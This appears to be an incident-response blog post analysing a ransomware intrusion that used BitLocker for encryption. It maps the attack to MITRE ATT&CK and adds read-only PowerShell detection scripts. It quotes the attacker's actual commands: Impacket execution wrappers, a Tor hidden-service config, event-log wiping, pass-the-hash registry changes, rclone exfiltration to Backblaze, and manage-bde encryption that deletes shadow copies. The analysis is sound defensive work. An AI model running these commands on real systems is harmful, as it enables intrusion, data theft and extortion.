
Nameless and shameless: Ransomware Encryption via BitLocker

Summary

Tl;dr

This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs.

Below is a summary of the findings presented in this blog post:

  • Initial access via the Remote Desktop Web Access service
  • Leveraging RDP, Tor and AnyDesk for persistence
  • Creation of new accounts
  • Using SMB and RDP for lateral movement
  • Exfiltration of data via Backblaze
  • Enabling BitLocker device encryption and holding the keys to ransom

Incident Overview

Initial access was gained via the externally facing Remote Desktop Web Access service. Upon access the threat actor conducted reconnaissance activity and deployed AnyDesk. The Windows command shell was utilised extensively to facilitate command execution and persistence was maintained via RDP, creation of new accounts and services. Data was exfiltrated using a lesser-known cloud storage provider and BitLocker was used to encrypt devices in the victim’s environment.

Timeline

T – Initial Access gained
T +2 days – Reconnaissance activity
T +3 days – Discovery activity
T +4 days – Execution of commonly used tools
T +5 days – Data exfiltration begins
T +6 days – Further data exfiltration
T +7 days – Device encryption using BitLocker

MITRE ATT&CK TTPs

Initial Access

T1133 - External Remote Services
The threat actor gained initial access via the externally facing Remote Desktop Web Access service on a gateway that brokers RDP connections into the victim’s environment, enabling the threat actor to establish an RDP session.
The first evidence of the threat actor accessing the network was from the 128.154.207[.]157 IP address; they successfully authenticated using a legitimate account. The established session enabled the threat actor to log into a host using the same account and deploy AnyDesk.
The threat actor also gained access via this remote desktop service using the same legitimate account but this time from the IP address 45.151.167[.]11. Subsequently, the threat actor logged into the remote desktop server and deployed AnyDesk and ssh.exe, as well as performing domain enumeration activities.

T1078.002 - Valid Accounts: Domain Accounts
Additionally, the threat actor leveraged valid credentials to establish RDP sessions via the remote desktop gateway.
Due to the high volume of password guessing targeting the Remote Desktop Web Access service, it is highly likely the threat actor was able to compromise the affected account credentials through a brute force password attack.

Execution

T1053 – Scheduled Task/Job

The threat actor used a scheduled task named GoogleUpd, which they later deleted once it had served its purpose (see T1070.009 under Defence Evasion). The following commands were also observed; they register Windows services rather than scheduled tasks and are covered under T1543.003 below:

sc create RustDesk binpath= "\"C:\Program Files\RustDesk\RustDesk.exe\" --service" start= auto DisplayName= "RustDesk Service"

sc create Tor binPath= "C:\Programdata\Tor\tor.exe --nt-service -f C:\Programdata\Tor\torrc" start= auto

sc config sshd start= auto

T1059.001 - Command and Scripting Interpreter:PowerShell

PowerShell was also leveraged to run scripts and execute commands, mostly to perform reconnaissance across the domain.

The below script was identified. Based on the file name, it appears to enumerate Active Directory account details for all domains.

"powershell.exe" -executionpolicy bypass -file .\Get-ADUserDetailsAllDomains.ps1

T1059.003 - Command and Scripting Interpreter: Windows Command Shell

Windows command shell (cmd.exe) was utilised extensively, much of it through Impacket, whose smbexec and wmiexec modules spawn cmd.exe /Q /c on the target and redirect the output to a file on the ADMIN$ share so the operator can read it back over SMB.

The command below was almost certainly executed using Impacket. Its structure (echo the real command into a batch file, run that batch file with output redirected to \\127.0.0.1\ADMIN$, then delete it) is the smbexec template. Two details are not produced by stock Impacket: the mixed-case cmD.eXE and the comma after /c (which cmd.exe treats as a delimiter), both likely edits to evade string-based detections. The wrapped command unpacks c:\programdata\tor.exe into C:\ProgramData using 7-Zip switches (-o output directory, -y assume yes, -p password), which indicates tor.exe was a password-protected self-extracting archive:

cmD.eXE /Q /c, echo c:\programdata\tor.exe -oc:\programdata -y -p"fortnort " ^> \\127.0.0.1\ADMIN$\yk 2^>^&1 > C:\Windows\TEMP\wdfuai.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Windows\TEMP\wdfuai.bat & del C:\Windows\TEMP\wdfuai.bat

Persistence

T1133 – External Remote Services

As the RD Web Access service was externally facing, the threat actor was able to establish RDP sessions into the victim’s environment.

T1078.002 – Valid Accounts: Domain Accounts

The threat actor leveraged valid credentials for a genuine account and established RDP sessions via the gateway. These RDP sessions gave the threat actor a foothold into the environment until the affected account credentials were reset.

Furthermore, a domain account named backdoor was created on one of the affected domains.

T1078.003 - Valid Accounts: Local Accounts

The threat actor created a local account named adm on each of three compromised servers and added it to the local Administrators group on each.

T1543.003 - Create or Modify System Process: Windows Service

Various Windows services were created across multiple compromised systems to establish remote access.

The following command line was executed at system startup as a service. It runs Tor as an NT service with the configuration file below, which exposes the host to the threat actor through a Tor onion (hidden) service.

C:\Programdata\Tor\tor.exe --nt-service -f C:\Programdata\Tor\torrc

Tor gave the threat actor two things: an inbound path, because the onion service published the host's RDP, SMB, SSH and WinRM ports on an .onion address reachable from the actor's own Tor client, and a local SOCKS proxy for outbound traffic. The recovered torrc:

SOCKSPort 9050

DataDirectory c:\programdata\tor

ControlPort 9051

CookieAuthentication 1

HiddenServiceDir c:\programdata\tor\conf

HiddenServicePort 3389 127.0.0.1:3389

HiddenServicePort 445 127.0.0.1:445

HiddenServicePort 22 127.0.0.1:22

HiddenServicePort 5985 127.0.0.1:5985

HiddenServicePort 5986 127.0.0.1:5986

The HiddenServicePort directives publish the listed local ports as an onion service: a connection arriving at the .onion address on port 3389, 445, 22, 5985 or 5986 is delivered by tor.exe to the same port on 127.0.0.1. This gave the actor RDP, SMB, SSH and WinRM access to the host with no inbound firewall rule and no new listener, and from the network's point of view the host only made outbound Tor connections. SOCKSPort 9050 separately offers processes on the host a local SOCKS proxy for outbound traffic through Tor, and ControlPort 9051 with cookie authentication allows local control of the daemon. The .onion address itself is written to the hostname file under HiddenServiceDir (c:\programdata\tor\conf), which is worth collecting during triage.
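As an added example (not code from the original post), the script below parses a torrc of this shape and reports which local services it publishes, then looks for a Tor NT service on the live host and parses whatever torrc its binary path points at with -f. The sample torrc is the configuration recovered above; the service hunt, the port-to-service labels and the function names are the script's own assumptions about what a responder wants to see.

```powershell
# Added example, not from the original post: report what a torrc exposes, then hunt for
# a Tor NT service on this host. Read-only; the service hunt needs an elevated prompt
# to see every service's binary path. Windows PowerShell 5.1 or later.

# Triage labels for the ports the actor published (assumed mapping, extend as needed).
$AdminPortNames = @{ 22 = 'SSH'; 445 = 'SMB'; 3389 = 'RDP'; 5985 = 'WinRM-HTTP'; 5986 = 'WinRM-HTTPS' }

function Get-TorrcExposure {
    param([Parameter(Mandatory)][string]$TorrcText)

    $socks = $null; $control = $null; $hsDir = $null
    $ports = [System.Collections.Generic.List[object]]::new()

    foreach ($raw in ($TorrcText -split "`r?`n")) {
        $line = $raw.Trim()
        if (-not $line -or $line.StartsWith('#')) { continue }
        $parts = $line -split '\s+'
        switch ($parts[0]) {
            'SOCKSPort'        { $socks   = $parts[1] }
            'ControlPort'      { $control = $parts[1] }
            'HiddenServiceDir' { $hsDir   = $parts[1] }
            'HiddenServicePort' {
                # HiddenServicePort <virtual port> [<target host:port>]; when the target is
                # omitted Tor forwards to 127.0.0.1 on the same port.
                $virtual = [int]$parts[1]
                $target  = if ($parts.Count -ge 3) { $parts[2] } else { "127.0.0.1:$virtual" }
                $label   = if ($AdminPortNames.ContainsKey($virtual)) { $AdminPortNames[$virtual] } else { 'other' }
                $ports.Add([pscustomobject]@{ OnionPort = $virtual; ForwardsTo = $target; Service = $label })
            }
        }
    }

    # The .onion address the actor connected to is stored in <HiddenServiceDir>\hostname.
    $onion = $null
    $hostFile = if ($hsDir) { Join-Path $hsDir 'hostname' } else { $null }
    if ($hostFile -and (Test-Path -LiteralPath $hostFile)) {
        $onion = (Get-Content -LiteralPath $hostFile -Raw).Trim()
    }

    [pscustomobject]@{
        SocksPort        = $socks
        ControlPort      = $control
        HiddenServiceDir = $hsDir
        OnionAddress     = $onion
        Exposed          = $ports
    }
}

# Sample input: the torrc recovered during the engagement, as quoted above.
$torrc = @'
SOCKSPort 9050
DataDirectory c:\programdata\tor
ControlPort 9051
CookieAuthentication 1
HiddenServiceDir c:\programdata\tor\conf
HiddenServicePort 3389 127.0.0.1:3389
HiddenServicePort 445 127.0.0.1:445
HiddenServicePort 22 127.0.0.1:22
HiddenServicePort 5985 127.0.0.1:5985
HiddenServicePort 5986 127.0.0.1:5986
'@

$report = Get-TorrcExposure -TorrcText $torrc
$report.Exposed | Format-Table -AutoSize    # five rows: RDP, SMB, SSH, WinRM-HTTP, WinRM-HTTPS

# Live hunt: services whose binary path runs tor.exe or carries Tor's --nt-service switch,
# plus the exposure report for whatever torrc each one points at with -f.
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -match '\btor\.exe|--nt-service' } |
    ForEach-Object {
        $cfg = if ($_.PathName -match '-f\s+"?([^"\s]+)') { $Matches[1] } else { $null }
        [pscustomobject]@{ Service = $_.Name; StartMode = $_.StartMode; Path = $_.PathName; Torrc = $cfg }
        if ($cfg -and (Test-Path -LiteralPath $cfg)) {
            (Get-TorrcExposure -TorrcText (Get-Content -LiteralPath $cfg -Raw)).Exposed
        }
    }
```

Any HiddenServicePort row labelled RDP, SMB, SSH or WinRM on a host that is not meant to run an onion service is a finding on its own; the OnionAddress value, when the hostname file survives, is what to search for in the actor's other artefacts.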

Additionally, a service was created to execute AnyDesk, another means to obtain access to the victim’s network.

Privilege Escalation

T1078.002 - Valid Accounts: Domain Accounts

Several high privileged domain accounts across multiple domains were compromised.

The account backdoor created by the threat actor, was assigned domain administrator privileges on one of the affected domains.

Because of the transitive trusts between the sibling domains, the compromised domain administrator accounts could authenticate to hosts throughout the wider forest, and with the privileges they had been granted were able to administer systems across it rather than only in their home domain.

T1078.003 - Valid Accounts: Local Accounts

As mentioned under Persistence, the threat actor created a local account named adm on each of three compromised servers and added it to the local Administrators group on each.

Defence Evasion

T1562.004 - Impair Defenses: Disable or Modify System Firewall

The following inbound allow rule was added for RustDesk:

netsh advfirewall firewall add rule name="RustDesk Service" dir=in action=allow program="C:\Program Files\RustDesk\RustDesk.exe" enable=yes

T1070 – Indicator Removal

Once the threat actor had finished with RustDesk, traces of it were removed using commands such as the following. The taskkill filter terminates every RustDesk.exe process except PID 6824, presumably the actor's own session, before the registry key and firewall rule are removed:

taskkill /F /IM RustDesk.exe /FI "PID ne 6824"

reg delete HKEY_CLASSES_ROOT\rustdesk /f

netsh advfirewall firewall delete rule name="RustDesk Service"

T1070.001 - Indicator Removal: Clear Windows Event Logs

"cmd.EXE" /c timeout 120 >nul && for /F "usebackq tokens=*" %1 in (`wevtutil.exe el`) DO wevtutil.exe cl "%1" && schtasks /Delete /TN "GoogleUpd" /F

The above cmd.exe command was used on two servers. After a 120-second delay it enumerates every event log channel with wevtutil el, clears each one with wevtutil cl, and finally deletes the GoogleUpd scheduled task, presumably the task used to launch it.

T1070.004 - Indicator Removal: File Deletion

Files from the threat actor's post-exploitation activity, such as reconnaissance of the internal network, were deleted to hinder forensic analysis. The following deleted files likely contained the output of that reconnaissance:

  • C:\ProgramData\trustdmp.txt
  • C:\ProgramData\subnets.txt
  • C:\ProgramData\ad_users.txt
  • C:\ProgramData\ad_ous.txt
  • C:\ProgramData\ad_group.txt
  • C:\ProgramData\ad_computers.txt
  • C:\ProgramData\netscan\netscan\oui.txt

Tools used by the threat actor were also deleted:

  • C:\ProgramData\Advanced_Port_Scanner_2.5.3869.exe
  • C:\ProgramData\wiztree_4_04_portable\WizTree64.exe
  • C:\ProgramData\AdFind.exe
  • C:\ProgramData\netscan\netscan\netscan.exe

T1070.006 - Indicator Removal: Timestomp

The threat actor dropped the following files and set their creation timestamps to historic values so that they would not stand out in a file-system timeline:

  • C:\ProgramData\VeeamLicense.dll
  • C:\ProgramData\Veeam_ASv11_1500.lic
  • C:\ProgramData\wiztree_4_04_portable.zip
  • C:\ProgramData\libcrypto.dll
  • C:\ProgramData\ssh.exe
  • C:\ProgramData\netscan.zip
  • C:\ProgramData\7-ZipPortable_22.01.paf.exe

T1070.009 - Indicator Removal: Clear Persistence

"cmd.EXE" /c timeout 120 >nul && for /F "usebackq tokens=*" %1 in (`wevtutil.exe el`) DO wevtutil.exe cl "%1" && schtasks /Delete /TN "GoogleUpd" /F

The scheduled task GoogleUpd was deleted at the end of the same command that cleared the event logs.

Credential Access

T1003.006 - OS Credential Dumping: DCSync

A DCSync attack abuses the directory replication rights held by highly privileged accounts (Replicating Directory Changes and Replicating Directory Changes All): the attacker's host impersonates a domain controller and asks a real DC, through the Directory Replication Service (MS-DRSR) GetNCChanges call, to replicate account objects. The DC answers with the password hashes and Kerberos keys stored in NTDS.dit, so the attacker obtains the credentials without ever copying the database file. A DCSync attack was detected in the victim's environment.

Discovery

T1087 - Account Discovery

The command net.exe accounts, which displays the password and lockout policy, was executed across hosts.

T1087.002 - Account Discovery: Domain Account

The files C:\ProgramData\users.txt, ALL_Domains-Users.txt and ad_users.txt relating to domain users were identified.

T1135 - Network Share Discovery

Network shares were probed and accessed by the threat actor on multiple hosts.

T1046 - Network Service Discovery

SoftPerfect Network Scanner (Netscan) was used to conduct port scanning activities to understand what network services were actively running on hosts.

Advanced Port Scanner was also utilised to perform network scanning activity and Advanced IP Scanner was leveraged on one server.

T1018 - Remote System Discovery

Scanning was conducted to collect a list of neighbouring systems that could be targeted. Additionally, PowerView, commonly used for network and Windows domain enumeration, was leveraged by the threat actor. PowerView was disguised in the file C:\ProgramData\New Text Document.txt.

Once the PowerView module was imported, the threat actor invoked the below function to find all systems within the AD forest where the current user had local administrator privileges. The current user was the same user as the legitimate account used for initial access.

Invoke-FindLocalAdminAccess -Threads 100 -SearchForest -Verbose

T1482 - Domain Trust Discovery

The below commands were executed to collect domain trust information.

nltest.exe /domain_trusts

nltest.exe /dclist:

The output of this activity was likely contained in this file C:\ProgramData\trustdmp.txt.

T1083 - File and Directory Discovery

The disk space analyser WizTree was used to perform a full directory and file listing of the local system on two servers where data exfiltration activity occurred.

Lateral Movement

T1021.002 - Remote Services: SMB/Windows Admin Shares

SMB was leveraged to execute processes on remote hosts. The observed activity matched the Impacket smbexec template already seen under Execution; here the wrapped command runs the batch file that installs the Tor service.

C:\WindOws\SyStem32\cmD.eXE /Q /c, echo c:\programdata\tor\install_service.bat ^> \\127.0.0.1\ADMIN$\ps 2^>^&1 > C:\Users\%username%\AppData\Local\Temp\swadso.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Users\%username%\AppData\Local\Temp\swadso.bat & del C:\Users\%username%\AppData\Local\Temp
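This command and the one under Execution follow the same wrapper template, so one added example (not code from the original post) serves both: the function below recognises the smbexec-style wrapper, pulls out the command it carries, the ADMIN$ output file and the temporary batch file, and flags the two deviations from stock Impacket noted earlier. The sample lines are the two command lines quoted in this post plus one constructed benign line; the Security 4688 hunt at the end assumes process-creation auditing with command-line logging is enabled, and the function name is the script's own.

```powershell
# Added example, not from the original post. Decodes Impacket smbexec-style wrappers:
#   cmd.exe /Q /c echo <real command> ^> \\127.0.0.1\ADMIN$\<out> 2^>^&1 > <tmp>.bat & cmd.exe /Q /c <tmp>.bat & del <tmp>.bat
# The operator reads <out> back over SMB; the batch file is deleted straight after it runs.
# Windows PowerShell 5.1 or later; the live hunt at the end needs an elevated prompt.

function ConvertFrom-SmbexecCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # ",?" after /c tolerates the "/c," seen in this intrusion, which stock Impacket does not emit.
    $pattern = '(?i)(?<bin>\S*cmd\.exe)\s+/Q\s+/c,?\s+echo\s+(?<inner>.+?)\s+\^>\s+(?<out>\\\\127\.0\.0\.1\\ADMIN\$\\\S+)\s+2\^>\^&1\s+>\s+(?<bat>\S+)\s+&'
    if ($CommandLine -match $pattern) {
        $bin   = $Matches['bin']; $inner = $Matches['inner']
        $out   = $Matches['out']; $bat   = $Matches['bat']
        $leaf  = [System.IO.Path]::GetFileName($bin)
        [pscustomobject]@{
            InnerCommand = $inner
            OutputFile   = $out            # what the operator reads back over SMB
            BatchFile    = $bat
            CommaAfterC  = [bool]($CommandLine -match '/c,')
            MixedCaseCmd = ($leaf -cne $leaf.ToLower()) -and ($leaf -cne $leaf.ToUpper())   # e.g. cmD.eXE
        }
    }
}

# Constructed sample telemetry: the two wrapper lines quoted in this post plus one benign line.
$sampleLines = @(
    'cmD.eXE /Q /c, echo c:\programdata\tor.exe -oc:\programdata -y -p"fortnort " ^> \\127.0.0.1\ADMIN$\yk 2^>^&1 > C:\Windows\TEMP\wdfuai.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Windows\TEMP\wdfuai.bat & del C:\Windows\TEMP\wdfuai.bat',
    'C:\WindOws\SyStem32\cmD.eXE /Q /c, echo c:\programdata\tor\install_service.bat ^> \\127.0.0.1\ADMIN$\ps 2^>^&1 > C:\Users\%username%\AppData\Local\Temp\swadso.bat & C:\WindOws\SyStem32\cmD.eXE /Q /c, C:\Users\%username%\AppData\Local\Temp\swadso.bat & del C:\Users\%username%\AppData\Local\Temp',
    'C:\Windows\System32\cmd.exe /c "C:\Program Files\Vendor\backup.bat"'
)

# Two decoded objects come back (the benign line yields nothing): the first carries the
# 7-Zip extraction of tor.exe, the second the Tor service installer batch file.
$sampleLines | ForEach-Object { ConvertFrom-SmbexecCommandLine -CommandLine $_ } | Format-List

# Live hunt over Security 4688 events. CommandLine is only populated when
# "Include command line in process creation events" is enabled.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $evt  = $_
        $data = ([xml]$evt.ToXml()).Event.EventData.Data
        $cl   = ($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
        if ($cl) {
            $hit = ConvertFrom-SmbexecCommandLine -CommandLine $cl
            if ($hit) { $hit | Add-Member -NotePropertyName Time -NotePropertyValue $evt.TimeCreated -PassThru }
        }
    }
```

The InnerCommand field is the part worth pivoting on: it names the files the actor actually ran (here tor.exe and install_service.bat), while the OutputFile path under ADMIN$ is a short-lived artefact that may still be recoverable from the volume or from SMB logs.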

T1021.001 - Remote Services: Remote Desktop Protocol

The following registry change was observed:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f /d 0 /t REG_DWORD

Setting DisableRestrictedAdmin to 0 enables Restricted Admin mode for RDP on the host. The process was likely executed remotely via Impacket. With the mode enabled, the threat actor could authenticate to RDP with only an account's NTLM hash (pass-the-hash) rather than its password and establish an interactive session.

Collection

T1005 - Data from Local System

Rclone was leveraged to exfiltrate data stored on a D drive on one of the compromised hosts. It is likely the threat actor attached the virtual disks of other virtual machines to a virtual machine they had created, giving them a local mount point from which the data on those disks could be read.

One of the Rclone commands executed (see under Exfiltration) specified exclusions of files and folders with the strings "ackup", "BACKUP", "SNAPSHOT" and "napshot" to avoid exfiltrating backup and snapshot files from the target drive.

T1039 - Data from Network Shared Drive

The threat actor browsed data on remote systems via SMB. The following command was executed to browse data on the operating system drive of one host.

"explorer.exe" \\\C$

T1074.002 - Data Staged: Remote Data Staging

Data in the form of Veeam backups was staged on one host. This was achieved by installing Veeam on the host and configuring it as a backup server; Veeam Agent for Microsoft Windows was then deployed to other hosts, which backed up their entire disks to that server's repository.

Veeam was configured to perform entire computer backups, as seen below:

General ------------------------------------------

Backup job name: Agent Backup Job 3 - 10.2.0.7

Backup job description:

Source -------------------------------------------

Backup mode: entire computer

The entire computer will be backed up

Destination --------------------------------------

Veeam Agent for Microsoft Windows repository

Backup server:<SERVER NAME>

Backup repository: Object storage repository 1

Keep restore points for the last 7 days

Compression level: High

Storage optimization: 1MB (recommended)

Storage encryption: disabled

The Veeam backups were configured to use compression during the backup process. Useful Veeam logs were identified in C:\ProgramData\Veeam\Backup.

Command and Control

T1572 - Protocol Tunnelling

SSH tunnels were established to the IP address 128.254.207[.]157 from multiple compromised systems to create an encrypted channel that acted as a direct ingress point into the internal network for the threat actor.

Additionally, a hidden Tor service was utilised to tunnel RDP traffic from the threat actor to several compromised systems.

T1219 - Remote Access Software

The remote monitoring and management tools AnyDesk and RustDesk were deployed.

"cmd.exe" /C C:\Users\\AppData\Local\Temp\3458\RustDesk_install.bat

Exfiltration

T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage

Rclone was leveraged to exfiltrate data to the cloud storage provider Backblaze.

The Rclone config file was located at C:\ProgramData\rclone.conf on the host which was configured as a backup server via Veeam. The configuration specified that the targeted data would be uploaded via SMB to another host before it was uploaded to Backblaze.

The credentials supplied for the SMB upload belonged to a local account created by the threat actor.

Traffic was also identified from the virtual machine created by the threat actor to Backblaze servers. During the period of this activity, 5.2 TB of data was sent to Backblaze IP addresses.

T1537 - Transfer Data to Cloud Account

The threat actor created a Backblaze account via Google Chrome on one of the compromised hosts. A temporary email address was generated via temp-mail[.]io.

T1030 - Data Transfer Size Limits

Data exfiltrated via Rclone was throttled by specifying bandwidth transfer limits as seen below:

"rclone.exe" copy D:\ b2:/test//D/ --ignore-existing --auto-confirm --multi-thread-streams 150 --transfers 150 --config c:\programdata\rclone.conf --log-file=c:\programdata\rclone9.log --exclude **napshot** --exclude **ackup** --exclude **SNAPSHOT** --exclude **BACKUP** --bwlimit "Mon-07:00,56M Mon-23:00,off Tue-07:00,56M Tue-23:00,off Wed-07:00,56M Wed-23:00,off Thu-07:00,56M Thu-23:00,off Fri-07:00,56M **********

The --bwlimit schedule caps Rclone at 56M, which rclone reads as 56 MiB per second (its size suffixes are powers of 1024), between 07:00 and 23:00 on working days and lifts the cap (off) overnight. The visible part of the schedule covers Monday to Friday; the remainder is truncated in the recovered command line. Throttling during working hours avoided the network performance issues that could have drawn attention to the exfiltration.
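As an added example (not code from the original post), the script below pulls the parts of an rclone command line that matter for triage (the remote backend, config path, exclusions and bandwidth schedule) and turns the schedule into a per-day volume, which is a quick way to check whether an observed exfiltration size fits the timeline. The sample is the command line quoted above, including its truncated --bwlimit value; the function and field names are the script's own.

```powershell
# Added example, not from the original post: parse an rclone exfiltration command line and
# estimate how much data its --bwlimit schedule allows per day. Windows PowerShell 5.1 or later.

function Format-Clock([int]$Seconds) {
    '{0:00}:{1:00}' -f [math]::Floor($Seconds / 3600), (($Seconds % 3600) / 60)
}

function ConvertFrom-RcloneCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # rclone remotes look like <name>:<path>; a single letter before ':' is a Windows drive, not a remote.
    $remote   = if ($CommandLine -match '\s(?<name>[A-Za-z][\w-]+):') { $Matches['name'] } else { $null }
    $config   = if ($CommandLine -match '--config\s+(\S+)') { $Matches[1] } else { $null }
    $excludes = @([regex]::Matches($CommandLine, '--exclude\s+(\S+)') | ForEach-Object { $_.Groups[1].Value })

    # --bwlimit "<Day>-<HH:MM>,<rate> ..."; the value may be cut off in telemetry, so stop at the
    # closing quote, at a run of asterisks (as in this post), or at end of line.
    $windows = @()
    if ($CommandLine -match '--bwlimit\s+"?(?<sched>.+?)(?:"|\s+\*{3,}|$)') {
        $tokens  = $Matches['sched'] -split '\s+'
        $entries = @(foreach ($tok in $tokens) {
            if ($tok -match '^(?<day>[A-Za-z]{3})-(?<hh>\d{2}):(?<mm>\d{2}),(?<rate>\S+)$') {
                [pscustomobject]@{ Day = $Matches['day']; Start = [int]$Matches['hh'] * 3600 + [int]$Matches['mm'] * 60; Rate = $Matches['rate'] }
            }
        })
        for ($i = 0; $i -lt $entries.Count; $i++) {
            $e = $entries[$i]
            if ($e.Rate -eq 'off') { continue }
            if ($e.Rate -match '^(?<n>\d+(?:\.\d+)?)(?<u>[BKMGT]?)$') {
                # rclone size suffixes are powers of 1024, so 56M is 56 MiB/s.
                $mult = switch ($Matches['u'].ToUpper()) { 'K' { 1KB } 'M' { 1MB } 'G' { 1GB } 'T' { 1TB } default { 1 } }
                $bytesPerSec = [double]$Matches['n'] * $mult
                # A window lasts until the next entry for the same day; if none is visible
                # (truncated schedule) it is reported to midnight and marked open-ended.
                $end = 86400; $open = $true
                for ($j = $i + 1; $j -lt $entries.Count; $j++) {
                    if ($entries[$j].Day -eq $e.Day) { $end = $entries[$j].Start; $open = $false; break }
                }
                $windows += [pscustomobject]@{
                    Day         = $e.Day
                    From        = Format-Clock $e.Start
                    To          = Format-Clock $end
                    OpenEnded   = $open
                    RateMiBps   = $bytesPerSec / 1MB
                    WindowBytes = ($end - $e.Start) * $bytesPerSec
                }
            }
        }
    }
    [pscustomobject]@{ Remote = $remote; Config = $config; Excludes = $excludes; Windows = $windows }
}

# Sample input: the rclone command line quoted above. Its --bwlimit value is cut off in the post
# (the trailing asterisks), so only Monday to Friday can be read from it.
$sample = '"rclone.exe" copy D:\ b2:/test//D/ --ignore-existing --auto-confirm --multi-thread-streams 150 --transfers 150 --config c:\programdata\rclone.conf --log-file=c:\programdata\rclone9.log --exclude **napshot** --exclude **ackup** --exclude **SNAPSHOT** --exclude **BACKUP** --bwlimit "Mon-07:00,56M Mon-23:00,off Tue-07:00,56M Tue-23:00,off Wed-07:00,56M Wed-23:00,off Thu-07:00,56M Thu-23:00,off Fri-07:00,56M **********'

$r = ConvertFrom-RcloneCommandLine -CommandLine $sample
"Remote backend: $($r.Remote)   config: $($r.Config)   excludes: $($r.Excludes -join ' ')"
$r.Windows | Format-Table Day, From, To, OpenEnded, RateMiBps, @{ n = 'TB'; e = { [math]::Round($_.WindowBytes / 1e12, 2) } } -AutoSize

# 16 h/day at 56 MiB/s is about 3.38 TB/day, so the 5.2 TB seen leaving for Backblaze needs
# at least two working days of this schedule, consistent with the T +5 / T +6 day timeline above.
$perDay = ($r.Windows | Where-Object Day -eq 'Mon' | Measure-Object -Property WindowBytes -Sum).Sum
'Minimum working days to move 5.2 TB under this schedule: {0:N1}' -f (5.2e12 / $perDay)
```

Friday comes back open-ended because its 23:00 entry is beyond the truncation point, which is why the per-day figure is taken from Monday; the same parser applied to a complete command line from a log would report every day.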

Impact

T1486 - Data Encrypted for Impact

As seen below, the threat actor used the manage-bde.exe utility to enable BitLocker device encryption across multiple systems. The associated keys were held to ransom.

manage-bde -on C: -Password ********** -UsedSpaceOnly -RemoveVolumeShadowCopies

manage-bde -on D: -Password ********** -UsedSpaceOnly -RemoveVolumeShadowCopies

Encryption impacted both the OS drives and the data drives of targeted systems. The -Password switch protects the volume with a passphrase the threat actor chose, so no recovery key was escrowed anywhere the victim could reach; -UsedSpaceOnly encrypts only the occupied part of the disk, which is considerably faster; and -RemoveVolumeShadowCopies deletes the volume's shadow copies so that no pre-encryption snapshot survives.

The folder C:\+_+_+ BITLOCKER KEYS was created; it contained a ransom note.

It should be noted that Microsoft Defender redacts the BitLocker password from the command lines it records, so the passwords could not be recovered during the analysis.
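The following added example (not code from the original post) is a read-only PowerShell triage for this impact pattern: it lists every BitLocker volume with its protector types and flags the combination this actor leaves behind (an encrypting or encrypted volume whose only key is a passphrase and which has no recovery password protector), counts surviving shadow copies, looks for the ransom-note folder named above, and pulls manage-bde -on invocations from process-creation events. The event hunt assumes command-line logging is enabled, the folder name is the one reported above, and the function names are the script's own.

```powershell
# Added example, not from the original post: read-only BitLocker triage after an intrusion like
# this one. Requires the BitLocker module (Windows 8 / Server 2012 and later) and an elevated
# prompt. Nothing here modifies a volume, a protector or a shadow copy.

function Get-BitLockerTriage {
    foreach ($v in Get-BitLockerVolume) {
        $types  = @($v.KeyProtector | ForEach-Object { "$($_.KeyProtectorType)" })
        $active = "$($v.VolumeStatus)" -in @('FullyEncrypted', 'EncryptionInProgress')
        [pscustomobject]@{
            Volume     = $v.MountPoint
            Status     = "$($v.VolumeStatus)"
            Percent    = $v.EncryptionPercentage
            Protection = "$($v.ProtectionStatus)"
            Protectors = $types -join ','
            # manage-bde -on <vol> -Password leaves exactly this: a passphrase protector chosen by
            # the operator and no RecoveryPassword protector that could have been escrowed to AD.
            RansomLike = $active -and ($types -contains 'Password') -and ($types -notcontains 'RecoveryPassword')
        }
    }
}

function Get-ShadowCopyCount {
    # -RemoveVolumeShadowCopies deletes these during encryption; zero on a server that normally
    # keeps them is a finding in itself.
    @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue).Count
}

function Get-BitLockerRansomNote {
    # Folder name as reported in this post; adjust the filter for other variants.
    Get-ChildItem -Path 'C:\' -Directory -Filter '*BITLOCKER KEYS*' -Force -ErrorAction SilentlyContinue |
        ForEach-Object { Get-ChildItem -LiteralPath $_.FullName -File -Force -ErrorAction SilentlyContinue }
}

function Get-ManageBdeInvocations {
    # Security 4688 with command-line auditing enabled. Defender redacts the -Password argument in
    # its own telemetry, so do not expect the passphrase to be recoverable from here either.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            $cl  = (([xml]$evt.ToXml()).Event.EventData.Data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
            if ($cl -match '(?i)manage-bde(\.exe)?\s.*-on\s') {
                [pscustomobject]@{
                    Time        = $evt.TimeCreated
                    CommandLine = $cl
                    ShadowsGone = [bool]($cl -match '(?i)-RemoveVolumeShadowCopies')
                    UsedSpace   = [bool]($cl -match '(?i)-UsedSpaceOnly')
                }
            }
        }
}

Get-BitLockerTriage | Format-Table -AutoSize
"Shadow copies remaining: $(Get-ShadowCopyCount)"
Get-BitLockerRansomNote | Select-Object FullName, Length, LastWriteTime
Get-ManageBdeInvocations | Format-List
```

A volume reported as RansomLike with EncryptionInProgress is the one case where acting quickly matters: while the conversion is still running the passphrase is in use by the encryption worker, and the volume can still be read, so prioritising a live image of it over the fully encrypted ones preserves the most evidence.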

IOC List

Below is a list of SHA1 and SHA256 hashes observed during the investigation.

Type    Hash                                                              Description
SHA256  04f61d92f0723aadbd6410e329197b7a3d245b8a31ae5f71224946aa83ef3db8  rustdesk-1.2.3-2-x86_64.exe
SHA256  04fca867c197ef8afd566d6c650ce8b87c413488df24ab721029806eccb74807  AnyDesk.exe
SHA256  0c32498bd419c65565a5496cd528c11c74d5306d69e4fe29d8bfe36aa0274a92  PAExec.exe
SHA256  18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566  netscan.exe
